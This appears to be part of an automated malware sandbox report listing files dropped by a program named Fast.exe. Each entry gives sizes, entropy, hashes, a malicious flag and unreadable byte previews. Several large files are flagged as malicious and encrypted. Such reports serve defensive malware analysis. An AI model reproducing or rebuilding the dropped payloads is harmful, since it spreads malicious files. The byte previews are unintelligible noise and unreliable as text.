    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15410
    Entropy (8bit):7.9868091309213085
    Encrypted:false
    SSDEEP:384:id/nE3FBl5n2lOVEu7Wy4W4UozVXg66Q0GCYUCm8JQ:onE3Ff5nE7uzJIzVF6DzYUCpQ
    MD5:2B4ECC3B55756C73AFC8E0E3B644FECD
    SHA1:A0A2F08A5B33CABCCC880557236DEF7097C0DB54
    SHA-256:AD106C6E9381C96BF367AE350D0836140829CD7F976F02959C8435D9E5AE1E6F
    SHA-512:A020139789BAB0484F7E96564333AE5ABEE93D90A32C469519DAE7A071C1ABBE0744A544C4C6B4163F4FD3D7155BD319D9CDB370F96379C65DF473751617E6F1
    Malicious:false
    Preview:....[..a...../~.(..)w.#?.Y>.#....B9G....(.Ni3!\...m.....MOy...S....[.....bL..D"...8...5.....D...n-i.q..dPq9..k......*...y..t...md...PY.$.~6..3L.f..\..D...3b.(.....?/.01..?Y&.).h.r....jS..|....,.0...F>.......D.k)..3..N>..A.sn..m.)...j/pe..Y`.r...K.ie.|x.?{L.`6T(..3.6._.MD.f..../.<..A..?....=..><.b...........#...ZY..}.q....X......qX.|...C..|8.M.W..(;.y...8..de..m...4...00...cW.X....'.....<..lL.P.....0B.;.SD.5.#h..].+..#..0xw7.&...%..Z......q.nd[...'^.Pl..I....2..`.B.ZYD. ..onpm.vj\.A..%. .. .4......y..5..}..>.....K56.....'B.7..)........!.....adn@R!.....Uj.....Z....$vT[.P.r].........E...6.....[...H(....<.p..:..Q..-.....#.L_....,..Y.{XE.a....S...p...|\...l..."...V.2.bfV.#$u.S.c....5..N.k.l.....;..s.{.).....1@.&.....B..#...Y:..@"..W:.N.N..<I.PP..].t.L]..Z....pWT.o..... ..%L......X],P.+XD....S..ef.n.2.5A....s.... ../..m.V.+.d..a.a6^RgJCC...8D*+_.IO..?.R..v..H....K..Rw.7.>C...xU......\..!.j.UU.~......../3z0a?..{.~......L..kf......|.n}...%...37....
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):9618
    Entropy (8bit):7.979440769866654
    Encrypted:false
    SSDEEP:192:78MBBRl14d7/hAJPGDDNh54PWcFe9/9DeH83+/WYlRA:I/d1genN6W4qd3+rlRA
    MD5:5FB6EF6E81DE16E5E3F3E9EB67BED0FE
    SHA1:6BE450A174C5C1F07871FE344BEBC91B9DFD6910
    SHA-256:81C501851149AD7453ED299C151C51A597A62DB61F0840C4F93CEE4F8A8D9E45
    SHA-512:F2D1CA138D89F656F980D64B811FC6A335F6F9BAFF1C7AA4E9021513545B2C2BED1257AA14A1AD719A1C9DF127BD003B6A138904E7499F285FD8C24C94E1B9B9
    Malicious:false
    Preview:.#..)..F.O.@..rU.(.v.,.qE.....K....M0.'...^tO.2b.@T.F.IO5.@C..C....w[0..y.^..w...~R...km....>I..3M.~.r.! zjie..c.......D....2s..(.ke.+.Xz.1....X|..U{.rS.l....9$.8v5_Ad..4.;Lq..f.6!..U.......6.P..8......y...#.r..A.v...MP<....5....g%L0..*..2.\.k.......\.\.......5...J...C.`]?V..[ .i../..y..U..{......GM.TsvL5....z8`.q.......g..US.k.;.:"..uv)g.$T~....8.............Hy4..=...;g/........n..'F"..u_Lq9...@G....O.%...UA..z[.....A;..j.......fm(=B..0.i..WQ.w4..hnw.KS0"H.w...~.!e..N<...w..!../..H.G|.....t-...wm:i....*.i.Gq`[h\R..;.....ag.|Sl.....$N45OI.c.d..a.K.....+.e...a......g......Xo.FqZ..B.k..n,..y..`z.L..l..E:.C..+z......P.(o.J.}vt..I.L...6.t.....h.l..+.8.4}.6......8.S..M.......O.... !.&r...&...g....o.wjh...1..w..;c.....V....7..i.ch!R..1...94\n..M....d7..3.V..6/.1..,......</N.."....y....v.B.uY..Q.n$.l.n'..W..lc@.A..:.ss;#.0]..As..K...4....Eh/.y..#m.. ...PC.Y..j..7jX..X\.39....k:.p..?F..^.>..g.2j..%M.o.LQ..Z..f.6..3.X+...]M}..+N..U.......8...6./_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):6658
    Entropy (8bit):7.969632873152686
    Encrypted:false
    SSDEEP:96:GGrHO5JfrFCB7xYONzFWo3qAUvOC09ciZNiYDwbJFZghy/1c4mgMLkLHGRBWs7i0:ZrUrcHN1X5/MJJFWhaUkLHGv8LMU5A
    MD5:257279D631B4E9CFE00C25AF6609662C
    SHA1:E7D4CF4DB5A6DA56189BCDC646AE312D7C82BE7F
    SHA-256:DDB5ACA9589A37A260DF45EA0D02295577543EA6984F028D8B2FA17FDBAF55FE
    SHA-512:88463843CE8E5D2BB4F4B136AFF9DB03D212C8EEB86BF8A418AE711E0A6DEDA7A933D88DAD4987CCDC3DE1D51C28262512FA2D7D5E1B66379B7DC10704AE82D2
    Malicious:false
    Preview:.y..B..a.....9)^..d....3...i...t..D...cx.7P:o1.... N...|I.q .0i&$..wB6.......F1..../bdD....7N.o.......+.9...GMR....M..1...A[.%...+O`......|.Gk..t.m.'.../...1.x.[k..2.-_}.....;Cr......N...x*.~.7....hh.b...[..J....M?.|?.....z^+...]h....}.]..&.....e..Xf.PY..6e.....10...T....~W</&%jQ.Dz..C.'.6T.....S.Xj.~:2.........f.F....#../.=....R\"..v....-....;."vQ,J$......[..P......6...N..............{._8.R..mGb.8...r.N..A.....Y..`'$.=5S1..>{/d...R...;.KZe,.e...k.-....jLw..e.y...9...GY....E.l.a..h..|@." =o..4.DB=...p.......B...t....>..;D......R..Z]..x....B....^.m;T.m-Z.....n....~K.o.{.8...L.7t..N....,s5......H..Jy..u.K.CR.!.z.......$.2.I.\...Z..x[8)...H.....c....Uv".......@...{$..z...f.y.G..Q'..yl8|.;[...MV..~H....y..p..v}..U.e}BXFoG.n..UB..S.U.......j)/g.>y...5.'z.mh....jx..).-f!xi!.-.8:..G,U...>*x.}....{a....Y...8...E.-`...pp+.p4K.j`..;O.C....tc&h..em..s.i..Q2...({....n@".......n..b.+OW.}gdTT.x.vpm.I#t..s....t..M4...F$.,..'..g..H;..,h%...09..1:.I...$6G..(.(..
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8754
    Entropy (8bit):7.97623845041928
    Encrypted:false
    SSDEEP:192:sf4ABhpkfFXqi+KOQdDXMpFoYvqxMXrdl5fk2MfPC/pZT96NaeakxA:s9hQFaHqLmqxM7drfkDKpZUUeZxA
    MD5:38BD7F9F5BD9C1AA5A28FDEF30410814
    SHA1:629A67459543953BD54785F6BEE70D00FCAB394D
    SHA-256:89869CE72E215BDC5427AA142AF40AEBAC6163AC55AB9D1A2E4F70F98C13590D
    SHA-512:3439C818B3CE735C22D157600DC3ADD4B4F983107E70BB0B17977CB7ADCD47A67A8FCFBE43EFCA71071E04598BF8DDC035CB3D0EB51F3D82D2E2F3A66A2C5973
    Malicious:false
    Preview:yC...L.2........k}..6.4Z...x.....^1......#RP.FO..i...d./..(..$....!]Np.s....k:d..{A!S.l..M.R!.q....h?R....$M..IVu.%O>...7..FY..*....^.@.5?k........".*4.*/D9...Ge..m.].s..{T.`.".s..Ay.5.P.yh.h.#.....N-.:2x,.....n....+V..z..}..*..s....i.&W..,..0.+d..H...XH.I...Z.Ko....JD...."oP`.B..4..)......;..w..m....:.....Z. [..X..=..7O..=\..*......j|....v....{a..Mwx..?.O.....w..i6o..../'.#[.Mq..AE...o..{.I."O..[kA.d.J..j#. k.jz..g...5/v..._..Xc]Z.x.S..6..6.~s.....J......L...x..d.IiT..v....*].~ ..|G..^...*9..4..uB.......3.....[ ..@..4l........A...<..Vi..@|Uj.t.EW.h....y.L.t.i...*......yT........,..Wj{..........W\..f.`..V..s,u\....]7.|;.U....1^...|ml.N}v.%.....1k.;.fM..Xy...p.^...y......d-=-uA...XH..2O.SW.Z..<.!..sn"G,..Q#...f......M..<.....-Z.R.M1..9....B..$....{:j..Ya...{.3$....@.C.8T2x@0%b..h..@.@.^.T<\O.zs..:..k.|P:.~.m.*H...t.U.).;.......G'..V*t.....| ..*i..i.s..Y.#....R..8.$.85z......fV/.h..|.G.G..j..R.h&T....i.."n.B6`U..o|....:..0.Ez.....h.;|q.T..O
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):11202
    Entropy (8bit):7.984502349267868
    Encrypted:false
    SSDEEP:192:9Fw8VKVXkBzyf8ndgYivwIulXQFb1P/EbIczFbgN0JsBwl6mJcY9hD7DA:lkXkBzyfOgYqwHlXQLP/MFbI0KBW5fDo
    MD5:4A48E38D9795DF70B71DDD2070817110
    SHA1:3B1EE9FDB64570B2E08B1E0133FEF0D0762B6834
    SHA-256:3A716CB94FF8270F853891167104E7A017F0A8BB3A2499A30367017A281043EA
    SHA-512:3A3E159068F9CACC8A1FC539735C92731B75A55438EF5D2168B951084AF3773E488B8D31CAC9F15CC8B1275A67B68FCBF1A63FB050DB6F38FB9F41FD8649FC9F
    Malicious:false
    Preview:..V.<.. MT.n.`...v)......s......f:..(.\F,.a..D.7...>C.?j...T8xy.Rn.z>Vg.s.<...lM..T..d..e..GQU.D....".....u.myV:.}...I)h6....v.I.....S].....5?..;...Fz..,..T.Q..{.$.. .gO.}x..x.so...u..v.......Y~.+...t"..0;..\.O-..bf5!.b'..j.\.Jj_.):.AG......Z....JY...{r.>.zD].....(x..zV..;.F.......P.....2...r.iZ.....L..|...B.."....m..k..D..v.D....TsU=,.-.X....V[..l..1kLM..u....>...<..... ...E..d....ed.Q!.q..U......n..5.E..[...b.T........(.....a..lT.|`....s..E@....Ojlr......M..C.b-...Kv..T..Oj.n.Z.Z.~P!"....:...y.. ..k..7&'.(n.)....;.5D.r.84.I..f....X..w..x=....B!6..-7..2"._l..`/.a........wb..C_..M.*.-..y....R...@......2...........~.P.f..HNe(.'........[...m.n...k.8.3"...h.. ......[:Y]...e... *..<.kFb..v5..T9<T..E[.g..0.Z.yw.....d.q.0....._..{]....u...".#....\....j.*.S>f.c.Nk.....4.D.h..f..NS..]c..h(.a....5H...3.X!..2.&y.9.@.)^e..@..7..3..%....k.*..j.6.zj..Lh.H....../*z.d..-....l..~..5.7X8..........p..-..\...5...R......._..Ab>....t...%.F.pW]I..z..x....._.wW
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8514
    Entropy (8bit):7.9791135115213425
    Encrypted:false
    SSDEEP:192:OzjRoFEDXv/k+AFVsvxAJw2q/6p4Ovrp5YRx2SZBl8mWn5HUdQ:OyFc/Mwxac6p4Ozp5YN58mg5HUdQ
    MD5:334F95AA2DB3E80D56D33F75B1D263E5
    SHA1:4077DBAF68D1E3A866E5CC04BA8D110C1F7EDA96
    SHA-256:CCF2AAA3BC41EF617B0095AC27EB1E0E2E6E8D5070C507F980593F8C3A0BA15C
    SHA-512:76EBAA959DD76227F7FA5BD9DDE9C41366398F76B1194C0D732DDB0B2838978C8DCEA92B2EF88E024C5AF7A539A195A131838214C39A1CB86808806426C6D1D8
    Malicious:false
    Preview:..x.....y].YdyH......../?..$..=..vN..j'.........S..f.....t.O.E.9.l.@AF..;..l..~.Py...k.A..].n...`.......Lk.2=..y./.M..Q0[y^Q..J.V......F.0h L.*=..M......K.,.d?...<l.`Y.).....&._.e...3.)..oi.....@Yv..k..G..4."uw.S:s.L.A.....".7Y...FB.@R......<.f.+n3....s.|z.t.._]r...q.R/....M...7.Lu.......|'...[d....y. iP..t....X..Ug...!TAN.2.z...".nP..`.....s.g....H..3.C.?.;&...2..6Q... .U..'m.G.7n....P.e*W.... ....mK.U....c.P.>...}5.`...O..~....y+.N0...2..txc.X$.1.-.+........pk..)<.....@5...w....q.!+........{x5|..#.iz.'.2.r........8[.P..../.V.>8.f..V.2.I._..]'i.`.Ra)...X<....qC2.].0.eS..*nOt..-u..){m._}&...-.1D.O.}..+.......9\P}o..J......]....B..4...s.p.,...~.9(...~X;...V...?...>GZ...a.L.....=._Ym6..`}.!j..$.q...A. A^x_5.X......IJ..n....$.M....\....7.7*r5..jm.....K..a.9.....K...0Px...4Z..%.....0....w/..Z.....t....g....dh'iX<..v....*).U.V.Z.Mwe.*Y..K...d..nVR....5.3).NT......0%~.Wl&...m.k.t....f....e{.@...trV..m..:j.d.d.*.P..y.a..w5).......y{m..U..^L.[.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):8610
    Entropy (8bit):7.977449473781163
    Encrypted:false
    SSDEEP:192:xf7cU5F2pZbLW0gnOWKwTWkAFdJyCSw/LOmHRirVYs7rQ:xDNF2pZbSCWvTFAFdJyCSUxoSwQ
    MD5:E54FF5B24EBCF44B3F531DDAB55BDA64
    SHA1:864FF8AB951C6D550C053213840FE81298621501
    SHA-256:4F77972AE007FC00C9D4FE0A2C78563FEC932C0161EEDC77C691419DA3ED737C
    SHA-512:6B79304CE81DDF45D2E143FF2859520A396D1258AA8DD4F279210FC41725E97A3DE62A8E3D718F31CF4DE9DDDA23E5B992030349EF80533BC031F7E1F12F8B73
    Malicious:false
    Preview:d...uj.v.....*^$..d}..B..V....T,......*.@\.....u....q..}..W.>.^X...[..=KVB.......W[.(N.@i....SM#.|..Ge...D&6P}..T.Mrg{...*......s.g..p..2...........f.3...i..N..=...PI..T7.$]..w.V..n,a._..R...%GG...S.}(.....c.9..P..C.........3m.,....R...qd......t...%wz.|.'.:..m......j...P.@6.g(.fz.L.O:...X......kXbi..N,%...SA.@.E>...U.r..i...S.$:.J...u.Y0{.<.N..5:....IW......D..)...4o...&.....U... ><.h(.B|..rv...q....!..v.[....%*..^.....dp.....;..R.^.=.m.g.. ....^.#...?.<=..$@. .|.7:.....#.`.%.p....m.O..........6...."6.+..r.2L..b.RI....)....L...@iz....+..;...Bq..A....D@...Z.79q-S...f...E;.r.3.....C./M...vm...^#.._.(..Z'.&0....m.........L.k.... .....}.h.......A._.FT}.(..R/x..{..an.7B.9.FwEhmyq....aZ...L... KF......[.=....l../-..3...........p...".._g... ..+$.1l#t...!..RB..eA!8....J..w2.....l.<a..`9L.&.n.:aeC.;..f.].........X...Y.z.:'.n..0W...`~...~..9"Q..t,..` pA{@Q.Xw. m...S8v.QszE.'Su..-....._.h.......:M.........p.6..lQ>/+....Z......."/.........1..xu.gy
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:COM executable for DOS
    Category:dropped
    Size (bytes):4242
    Entropy (8bit):7.960198561614512
    Encrypted:false
    SSDEEP:96:jJoU5tbBEX39K59XPHYR781WHlMrjj7rUHW2QhNZdPe2zfQ:mwtbSns59XPHEdHlMQ0hNJzfQ
    MD5:BA1155B150169862CF508893A34EE633
    SHA1:FC873C1FAF68551D3737AB9A76240739735705AE
    SHA-256:E050BB6932790A6BDAC3CB1AFB633EF5A1A404AD39400D4F5CA6E0B414B66469
    SHA-512:29CBC4103991FB4B66731E04126B9962FD30A9074410EA8467E18F25202BFCC35296D5ECD6462213C5BEFB332D33ACDDA47504A9F2E9197DC2E07BAD4AE69A6A
    Malicious:false
    Preview:#3.!.c.9....A.z.kl^..=..L.K...5*...]F.8.Ts.&.9.z7t5(".<.....a] .@|.S...6.....Ns.,...j.U.a...5f.K..P.,^..r.ue5.c5.......M..yO.....Y^.....n..9......J.C7v+.W....B...f.}`$.6k'..Z.g.! .Wi..|U...........^H8.`D...?:..`......u.....*........g.....2..tHHy....E.\9.x.5..\KJ.2S..-.Q...%.#F$.....j_Lp...U...c.h]..aAH..T.}.Jp .(....c...N....8&14...7...................OP..,.n....6..xN..CS.../..r.{^..Q..H.{.d...M0).2aRn......x.6.V..:..lx...U..~..~...i.f.E..........N\k....b:......j... U.....U.........tB.....*k..5.Y.gJ...../a-....k.....1ry....q[.q.K?[?.|....l:.U.B...7Ch.".H..L......V...2&...Y4O..M...W.....Ov.4.@h.z..gP.Cr..R..'........jJ.U+..(....y6...".......9....}...&WZ...b...1%.s.3..~.....3QVd.$.j..f.'.P.2g.m..#'.Vt.J.0.x..v.",....gP..W.".WvR].....H...".#..e.......k.'..XV....:....`/....!...77...^..G...7dQ..\..r..([.....Lj.Q............,t7.....46..>o,.n.@....C.....Q.....:H.FNU.B|.F......a..id.k.....d....%..b.2;"N..k.?A.QE.^..N.<......!......t......../'xFg.V.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):15106
    Entropy (8bit):7.985269698708576
    Encrypted:false
    SSDEEP:384:D7ahhgq8yn9I3Kn7KPsCXMlcitSArIWfFSC3DPSBw/SzDrY2wm5zyHQ:hJ3Kn7289tBI6zPHKzDXHpmQ
    MD5:064705F617EBE50BB308FF5A84569682
    SHA1:321737F573AC3DEE357B527C6E39144D9219F14D
    SHA-256:C5C03EB1DA28B25688F6B672E01F6C9644D0F2CEBD8ECB3CE4EEBD2093893A7B
    SHA-512:149BE8E29886ECF8FC7BF41C3FDCEC0EF2F65AF054FCE62A8CE4BF4CA0C9D04C33623B22E2A32C1EEE3983D5582287EA928EE4766001BCF47F609957E0BF70B0
    Malicious:false
    Preview:dxp..}C.A.]...1A..^...B....!E.K.....tG.:&..K.[..c.7:.R..... tK7.%y.k..`..L7.....(H.i.*h.Q.........kE....N.u8..E...Hv%l..}q.O}..qY...o.....V.X{....Z}..D.^._.V....s"..Q(....F...7g= .^+.9..H.t..~....I:.).s...~;zh).XU..i...dy~q..73t..|X.D.......C.tJ"......\..%...)G...Cg.-Neve.......x....d...n..ws.1.0..ci.P.4....0.M..j..)..........D^..X..A.......F.,....r...R...Lm...Se0.$^N.4...Bi.....z.7?.'.Bqh.VEq....;f.F..#..?..k_.u.9.Q<..+v.)u~.i.M7..>@).&OJ.x....]....g?.~...P..{.h...um........4.]jS....J;.h..xpJ.......5...:.....^.........K...<....^.}.ut7.....i.*....y.t...<....2.....W..9%4.y..7...}`..d..9S..`.:%...YB...z....0..}.,.L{C..4..[....O.%....E.[.?.z.L...$F.^..OQp.......zb.^.....[h.p.O....Y...i8g...e.q&x.z\'.........&....g|...h......F}he2....TE.../EZ^......m}.X.A!8..@.u.u.R...u..m5.k.n.[rf.E.....h...0.. \v,|..U.l..\~....wU.g..c.0.?/.z|...~? {%..4#..5.@m[,(....l....<.cv..ur....\.....3.R'..<..iSl.T.=C..:......(].+?..z.y=C.:5^A....2.:."V.fx.@J#......x....9.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):610
    Entropy (8bit):7.564061946783669
    Encrypted:false
    SSDEEP:12:AZ0UHvuHQA882RwROJi6sED56cRuChjnbwaBm39Lc:AWiB3H95dZhYKYQ
    MD5:FCAA7326C5199BB808FBA1D826E740F7
    SHA1:5AAC720AE0DB163F53B72FEA2917DF1A56F946EA
    SHA-256:6C66A49A9096A34DC51FA1394B807F2AAD7D5ED9811EE6D75036D3AF3CC5F288
    SHA-512:6018CA1080BD8CA6E1BCCC03B6E05F5CB81F4435F5B5375693DA941B6C738609FA6CD5246A8BFB0572FAAE00413BDB0691695A13C355D99C9A065C175013E7CA
    Malicious:false
    Preview:R..I...f..Z...Z.......txI'...;.>...U5I.b............ph.....[h.^k...37.IDi.!j2R.)..{..73.....y*..t..L...s.6..aOl...z.;.1.>4<....UqL...w...a..^xo'.T.f..&..Bt8.5......XZl-...,<....r.<..8.}.W..{Q.o.[.v.e...*)..b}.....G.p....7.....H..H.~<...=.1o.8]...u..bJ.y 8..a.KN24Fx...;3.......Y..IC3Y..P.H.u.{K..VgE:.....^..(.:...4.......l.W.4_..oo.....U...#...n.c...q..|....Bpd.hw9w...o.u....+w...@.=.~.2..7..>R..v..D.p.v1..lw....................D..\IjR..#........I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1954
    Entropy (8bit):7.884327278264781
    Encrypted:false
    SSDEEP:48:bYO8mUXBBfrp0uswjJPeHjnSnwCYUoqtKddfM/g46Q:SmUXBBrp0uvEDnSwie5g16Q
    MD5:6D60BAB61DF258A68A7AC98A418233F5
    SHA1:378310936253C4F4239D740A60ED7388920FBF43
    SHA-256:65C437C35EFA5278817887F8B2C11B9AF0AF4200F7B905E8C40CD019192C9E83
    SHA-512:CC78B46448CB559EEE55CF4C06CFE130162C0C33AD3C5ECF6A08695F72F8F33D9A8E60B07197E6F5F3EF9AFD02D1A472E5A8F30A2DCEB32055399F94EB880381
    Malicious:true
    Preview:.J....0=e.{t.|.UZ.8.5..cT...#....9...w.N.4IJ.B..2...AV.g{....#v...u..Y......n.....D..!........[`..)...mCY....aG....<.;4.1....x.W.D\...A.......).,..9.t"..p.%.kE_.V.....k.K....D..i0g..c.......#Z*U#.'..OW.,...MI_..a..v.........qJ...N.O.B.k...I.&.]..".4..&.g(..JHj.XN.<..Ye..g>...W...hw.A....2+f.Z....w........n.{.@hk.3.=..l.....S...q.d.........X.....v`T8......Mx.z..7Y.Bh.h.$...rj..:.S../.Q.e...!@.r.$.-?......Gr..j.:.....z..Z.W.^...F.....Y._.E.)$U.mb..E..'.[D..J..Y.j.._.Zq...u.A...a....G].......v.bF.;..c;.Z..~...6...7..F.o..7L..$D....}../.R..@N.$.c...RH..8f.p.W.!..d..i..VqX.....QQ....:;.KP......zN..0{.k@r...e....PKQ.5YR.NQ......\8..5..9&.?.lx..i[.'1..0.K..'N..C.p.,Y..b.<.Se.3$:A.>..O.Q.>f.1....B.9G.Lu..P.EI............U...Y9'.4U.4..F....\..UE..9,........1R~..h/-d....M...j.c;...w@W......KZV...&.=h$e,\>4[.......k6....!0P....1.|..B.q.*.U&....s.'h?........#........ .`).....a.K<....~.CS....}.............Q.).h?...$F.9......z_x..p.1..o}.k.8..<..e).tg......
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):187154
    Entropy (8bit):7.9989893102207645
    Encrypted:true
    SSDEEP:3072:MYN65p7zNXYLLtP5zppwNDYfqcmR3tU69NxENln4RNkwjawHeWZsS27qoX/Idp6Q:dN65H/MKxt59NmN+S+ae6SoPIdpT
    MD5:9E883B0CE7F475B3C13FB29A80FA28F9
    SHA1:0F2CC890418206C228C14C199B6D6172C09B9005
    SHA-256:8F2FE97993E25E0EA8E53E31848FFFFFCF86D9FE6CDB4988DA5DFDC33AB9B203
    SHA-512:DB587C44C1566F319C93F400BF970C647CDFD6E2236288E0899F94B631DF497DDD71BC28ADD3590D00521B90B61ACB7C9A83C5EFE6503D2EB2A45E755FEEC269
    Malicious:true
    Preview:6..=.7..x>\...\.....W.M...A.......R..;r.....JC..I?.._,.[.7...U.............b.U...R.B....9....^..]..^.Af.}...U./..{.Q.c......Dx_U.k....%.Ge..l.g..P...-.z.E.^.Wf.....K.@L..+...7.K.T$...0/..w..GW...p*zo.V ..Q2..F".kV...........3!...~....1..a.<.l.5../.*G.i.....8.r.=Vq...........X."E.......N_......v.7S....+B..!(.....&./....>........G"[.G5$j..............k.@.W&....J. .=."D..%<.j...."FQ......Pq.....W.4?.a..Z.1....&.].{?p..r......a..l ..X...fs....5...0:-...*.O$.m.....@m.!4a.&.qrl....9.....;...#/...#..*..?_..\.8z...Q6p....>..(.f}9.E............S:.b......!.m..ET.mp.X.[4....Cs......R..$...S.L.]t..,AJ........|.-....l.S ..ul..\.i.......5.j`x..4..&.8K.d...........h..DkH..*.a0...wW..*...`n.0..+.#...-.....y.`..>....#Q'./nv/x@...Jg....i8n.f)yl;-...9 .,o".c.@.,....{1/.]..l..D..5....O.!..F.m.?....K..R{......,.:a.w.k.D.`B.....8....C...f#../&\......gF.\;....}S...3v.p.n.Z@i.`.%ooJT......}.A...H.L..T;../....U....z$YS.....dY7......4..........>...60G<o..\
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):213202
    Entropy (8bit):7.999012671568519
    Encrypted:true
    SSDEEP:6144:kioohBMOcEp69JsLagl1jaKLqN9qzza7/G4Rz16:XFBT6vsLa41jRwmz+/GCzk
    MD5:8C9352810A3550BA3496077F97B4F213
    SHA1:10140A08482600FB29C1911C9691543D17EC3B96
    SHA-256:3C3C89FE8664F434A0460FF4343845B40C5B7309336DB39F39370C787207D7C6
    SHA-512:5A281B3234A327A08F79D2995587D8E69C814E2747F3DCFAF0FA8DA8201A22A8CC68260F9E15C0FB99269C9FFAF4575884F93C3190C6778084DF2A99CFA2E17B
    Malicious:true
    Preview:.6..6.........x:b...V....4^....;vE.......Z.........hT.)2lt.:..x..3....@.'.a..^...)@.9.......d6.7I...j......@.t.c....'..&cz..r..?.d0...t.1...Df...t..\.f...:...o.[_....c...\v.....UL._.7N..mj...9p@1.s..!cvt.0r?..........[...zR.T.p....<.).<.^0W......4.....J..gy...(..f.^............k.N..ao..yV. .bCKS6.KA...D..\H.}<ab+.@.l..&....`}.u1.q....{.H'.Ns....@.z...'.'}4h.q...........1I......C...|+g..6.T.j..KC...0;..|:.u...Q$.D.J.e.I.t0...@|.%...r]S..A..G.....K).c....f...}_.....D.....`.,&p5.....qN./=.N+./I.p...w......R.V...g....M.Z.2....9....$....{d.m(.D...m....)T.( d8@H..o...B.d.@t*..W..Z"..B)&%B..U=.F...,..|..........T.g'.)*R..Q.+..%....c.@l.....4.ka..x.a].s..J....Ni.3..y....4.....X}.....I......9y......<4..s.`.H...4!.!?..f....5..V.Um...'t.Ex../...S"fE..9..bHd.*..n.<hl..iP9-ZW.@j..0s.Q..3..........B.E.w..]~.m...A..+.e++}..>dIX..]..h.Q._3]....p.....o.k...f.vO....1L./...9...%=u.3.N.!.{..P.."@.......#.}$g..t....jq.....j-..t.gO d....X.J.%.%yx@XH...k.3.q9J
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):1227458
    Entropy (8bit):7.999869724844986
    Encrypted:true
    SSDEEP:24576:Pxsubl+z/xsSp4ggpdWaGPt0ZBRkcgcstrz7Cjpl5qE:PxsuI/xX4gedGP2fFsd7oPj
    MD5:9DF3106D9813102DEB79D8D4C6AF8AA7
    SHA1:721EF59C4BA595435591A5A68025005710121441
    SHA-256:6CCCFCD3525E64CFB6524DB51338E56784CCA5CE8927CE9EE402AEECABC10594
    SHA-512:6DCDA1FD3B7DDD8E3FA703E49CC6F6B8592214A4CA481533C1FEE36A57C5FE67A22FDAFBC03768D736D9255333C64ED6199C909794088CC6B96FB6B0D1202F40
    Malicious:true
    Preview: ....'9Rv.......6N.c....+.%...9.z.!.d.L.....&.....B.L../'.$p:RBg08.'.z..\..p/A.s......y.q.SP..QeH..s+.v]{.2.g$cK O..>..._..^|Dunc.-..mL......._M.`...7......O.q 9...a"k...].1.9#l..}....6B...~&....Yg9.C....Z......>..)....P%;:.@..b-..o.-.....F.G...8..T....t+...%S....jS..~...R.>`..R......q.C....5....~....9..\.t+.e:l..d.,.b...)..m..1t.{9L.K.0......I.....P.[...g.>..%3o6..|...)Z..E.L.% ....}yV...]..4-..!.......F..`[.r.2....-w}..&.c.R.l\.......24.....1U..p.+.+*..M.k.2...h..S..:..i..P[.g..G+5FsR..........}%we.=?...T.G...N.....f.qA..I]..\...geC.-Q..\4<b...{.l%..U.C..M}........V7..Q..vU$).!.>...NU4_.9. ..g..q.0s..\.W.....Cu".jx.T..\...t'+bJ...(....t.....r...hh.&..,..eg..~B...........C"Z.s...8....0.z.X...R(.kt....>..mes....3j,...P'......~.....#bg.....q....'e..XZ.N..s...j...K..........=.x...]'.C....^.....;..SD{..CoV.....[.fD1.y..+#Gqb..."..8^....30.._..r...F.5.n3|...3..;s%...k|.Nre....G..<..g...%.O..+....%..-,..F.m..!.K....W.q............s,%B.
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):343762
    Entropy (8bit):7.999500888517108
    Encrypted:true
    SSDEEP:6144:43PbC/fDCVd5XumTa9NmWzlGZrS3Gdpk9mdaNJJSocbFxwE3:+jC/+T5umTANm+lGbdp7dRVbFxwQ
    MD5:697A4AD1AEC7606BB007468C63C4CCCA
    SHA1:BB1AEDCB0425BF2C7237CBB3EA7CC963CF28CA6D
    SHA-256:D02BC8B103611DCC58E6FAB76898138486AAF8BC55CC304FAB59119E9F273D88
    SHA-512:019CF07089DB3E2F8F52C32391B024F81842A636CE29A1437DA3D932903C841E2E7FF8224907AC88C2D1FB07F8866ED5CB382D1F06B0B9F236FF74B95CD4FA63
    Malicious:true
    Preview:W~.+.....0Zj....6.?pYF.....t6..)e..Z.........>Z+..m..{YGI....{..R.j.....e.a..=l..8...>F...g.2....h........9.w........q5=.{U.yLwt.....We..5..r.^..5.P.......@.....VS<.b.$.(....!..J...r.._..;Ul,I;T.....3..!.1.....'....Y..hY.:WJR..I.^=UC)3x6q...?1aP...n.j/..~.Y..g.I.....s....l..q*]....H.r.@!.......{..MA6.TF..c.r.U........&...C'.%...p..),."]Hu.<.#.:>..ev.G.-.........1#....8.+J.?.0.+.SRpOj.IC.A>...v".....3..=.A..6..|......:.f..'Uv.~xl..}".+...c2..&}..1V.:..e...t6E/..h.*WUA..,.....W>@q..si..y...i.=At.4...TfBt..8.......b."x..[Ww.'..V....9?%0.....'....+r..m/....Z...h.q.6w.3H..k^..h.q`B.%"...M.6k.n.......8.D.y(v..o?Dsx?.`.Bh{G......v.8.<2Y/X..p....eQT............D..y....?..z.w.f...P.?_...zO....p7.d.....v8.`.....s..[....%..1.CN.:.....y.=...7....C..?U...i.d..O... ...O.*......M..\#."...d......-...;...S.k..F.."..m....k|.RN.....`...n7.......s......#.}F...t...i..../2r...../..i ........[...C...z....P.. .X.q.i3..2r.R....)b..?}Q.;.Z....54.k/.H+...2..".f.
